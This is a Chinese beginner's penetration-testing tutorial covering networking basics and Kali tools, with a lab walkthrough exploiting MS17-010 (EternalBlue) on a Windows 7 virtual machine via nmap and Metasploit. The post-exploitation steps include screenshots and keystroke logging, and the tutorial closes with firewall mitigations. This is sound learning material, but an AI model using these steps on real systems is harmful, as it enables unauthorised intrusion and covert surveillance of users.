一、渗透
1.应该怎样学习呢?
可以从以下几个方面:
1.关注并观看一些安全网站与公众号
2.尽量保持每天看几篇相关文章,增加自己对于漏洞知识的储备量
3.多多利用好浏览器这个强大的搜索工具,不懂就多问
4.最好可以养成做笔记的习惯,将自己的知识理清相连做成思维导图
5.就是多多动手实践,只有实践出真知,才能发现新的知识
2.学习的工具推荐
1.幕布
如果是写学习笔记亦或者做思维导图幕布是一个很好的选择。当然如果你有更好的也行。
2.kali
kali是基于Debian的Linux发行版,设计用于数字取证和渗透测试的操作系统预装了许多渗透测试软件,包括nmap(端口扫描器)、Wireshark(数据包分析器)、John the Ripper(密码破解器),以及Aircrack-ng(应用于对无线局域网进行渗透测试的软件)。
简单来说就是一个工具的集成器,基本上所需要的工具它里面都有,通常都是作为攻击机所使用。
3.VM ware
简单一点就是“实验室”,在本体机上虚拟多个虚拟机用于配置模拟,实现对渗透攻击的实践与测试。同样有更好的也行。
3.相关知识
1.什么是IP地址?
IP地址可以看成在电脑世界里每台电脑的“身份证”,是在网络海中找到你的基本依据。
IP地址分ipv4和ipv6,我们现在只需要知道ipv4的IP地址划分:
A类/A段:0.0.0.0~127.255.255.255
B类/B段:128.0.0.0~191.255.255.255
C类/C段:192.0.0.0~223.255.255.255
D类/D段:224.0.0.0~239.255.255.255
E类/E段:240.0.0.0~255.255.255.255
A类、B类、C类都用于分配给主机使用;
D类用于组播,什么是组播?现在还不需要知道
E类作用于研究。
2.什么是网络掩码?
网络掩码,也称为子网掩码,是用来指明一个IP地址的哪些位标识的是主机所在的子网,以及哪些位标识的是主机的位掩码。 它是一个32位的地址,用于屏蔽IP地址的一部分以区别网络标识和主机标识,从而说明该IP地址是在局域网上,还是在广域网上。子网掩码不能单独存在,必须结合IP地址一起使用。
只需要知道,子网掩码并不能单独使用,必须需要结合IP地址一起使用。子网掩码是用来区分或者说是划分网络地址和主机地址,用于确定网络范围的。
3.Metasploit
Metasploit是一个开源的渗透测试框架软件,也是一个逐步发展成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。
4.nmap
Nmap 全称为 NetworkMapper
Nmap是目前最流行的网络扫描工具,不仅能准确探测单台主机的详细情况,而且能高效地对大范围的Ip地址段扫描。能扫描目标网络上有哪些主机上存活的,哪些服务是开放的,甚至知道网络中使用了何种类型的防火墙设备等。
来点动手实践,不然光看知识点有点太枯燥,就用经常被提及的ms17-010永恒之蓝漏洞吧
4.实验室测试(ms17-010漏洞复现)
1.准备阶段
确定漏洞复现目标:MS17-010(微软17年公布的第10个漏洞,亦称“永恒之蓝”,适用于Windows 8版本以下)
使用软件:VMware
攻击机:kali
靶场环境:Windows 7
2.搭建靶机环境
Windows 7和kali都统一用NAT模式:
确认kali和Windows 7处于同网段下:
kali用root账号登录:
(我这里的kali是改为中文设置的)
打开终端并输入ipconfig查看IP地址:
可以看见kali的IP地址:
IP地址:192.168.11.129
netmask(子网掩码):255.255.255.0
Windows 7:
Windows+R键打开运行,输入cmd进入命令行:
输入ipconfig,查看IP地址:
ipconfig
可以看见Windows 7的IP地址:
IP:192.168.11.128
子网掩码:255.255.255.0
关闭防火墙:
3.环境搭建完成:
NAT模式
kali:192.168.11.129
win7:192.168.11.128
4.工具准备:
Nmap、metasploit框架,这些都在kali中。
5.开始漏洞复现:
1.nmap扫描阶段:
nmap -sS 192.168.11.128
可以看见端口445是开放(open)的,那么就可以开始尝试ms17-010漏洞
进入msfconsole:
msfconsole
进入这个界面就算成功。
搜索ms17-010:search ms17-010
exploit(攻击模块)、auxiliary(辅助模块)
先用auxiliary探测一下是否存在ms17-010漏洞:
use 3
show options
在required下为yes的是必要参数
可以看见RHOSTS处为空,所以设置RHOSTS为目标主机IP
set rhosts 192.168.11.128
确认好必要参数都设置了,就开始run
这就说明存在可以使用ms17-010!
2.攻击阶段:
一样缺少RHOSTS参数,设置好RHOSTS:
确定好就可以:run
这就代表已经成功攻击目标机,
接下来就是后渗透方面知识:
3.后渗透阶段:
shell 相当于Windows的cmd命令行模式
chcp 65001 将编码改为UTF-8
sysinfo 查看目标系统信息
getuid 查看目标用户身份
screenshot 对目标当前屏幕进行截图
ps 查看进程
migrate -P 7448 监听目标
keyscan_start 开启键盘监听
keyscan_dump 获取监听
keyscan_stop 停止监听
可以看见目标刚才在cmd命令行输入的代码“whoami”“ipconfig”,其中“[^H]”是删除键,<CR>是确认键
OK,到此,漏洞复现成功,解决方法也非常简单
4.解决方法:
- 开启防火墙
- 将445端口拉入防火墙拦截